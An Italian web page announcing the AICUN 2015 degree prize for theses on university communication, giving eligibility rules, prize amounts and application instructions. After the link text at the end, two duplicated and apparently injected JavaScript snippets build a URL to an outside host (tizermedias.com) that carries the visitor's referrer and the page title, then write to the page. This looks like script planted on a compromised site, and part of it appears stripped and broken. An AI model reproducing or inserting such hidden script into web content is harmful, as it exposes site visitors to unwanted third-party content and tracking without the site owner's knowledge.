Premio di laurea Aicun 2015

L’Associazione Italiana Comunicatori d’Università ha indetto un bando di concorso per l’attribuzione di un premio di laurea destinato alle migliori tesi sulle attività di comunicazione di organizzazioni universitarie.

A chi è rivolto

Il premio di laurea Aicun 2015 è riservato a quanti hanno conseguito una laurea triennale o magistrale, un master o un dottorato presso le università italiane nell’anno accademico 2012/2013 che abbiano discusso una tesi sulle attività di comunicazione di organizzazioni universitarie, sia con riguardo alle relazioni con i pubblici interni, sia alle relazioni con pubblici esterni, con il territorio e il contesto in cui operano.

L’importo

Il premio di laurea Aicun 2015 si suddivide in un premio da 1.500 euro da assegnare alla migliore tesi magistrale, di master o dottorato, e un premio da 500 euro per la migliore tesi triennale.

I requisiti

Possono candidarsi al premio di laurea Aicun 2015 bisogna essere in possesso dei seguenti requisiti:

• laurea triennale o magistrale, master o dottorato conseguiti presso le università italiane;
  • titolo conseguito nel corso dell’anno accademico 2012/2013;
  • aver discusso una tesi sulle attività di comunicazione di organizzazioni universitarie.

Come e quando presentare domanda

Per partecipare al premio di laurea Aicun 2015 bisogna inviare il certificato di laurea e/o certificato di Master o Dottorato di Ricerca in carta semplice formato pdf, curriculum studiorum, copia della tesi di laurea in formato pdf, eventuali pubblicazioni, sintesi della tesi di laurea, master o dottorato (massimo 5 cartelle) in formato pdf all’indirizzo email infoaicun@gmail.com entro il 15 febbraio 2015.

Bando premio di laurea AICUN 2015(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();(function(){var d=document;var w=’240′;var h=’300’;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();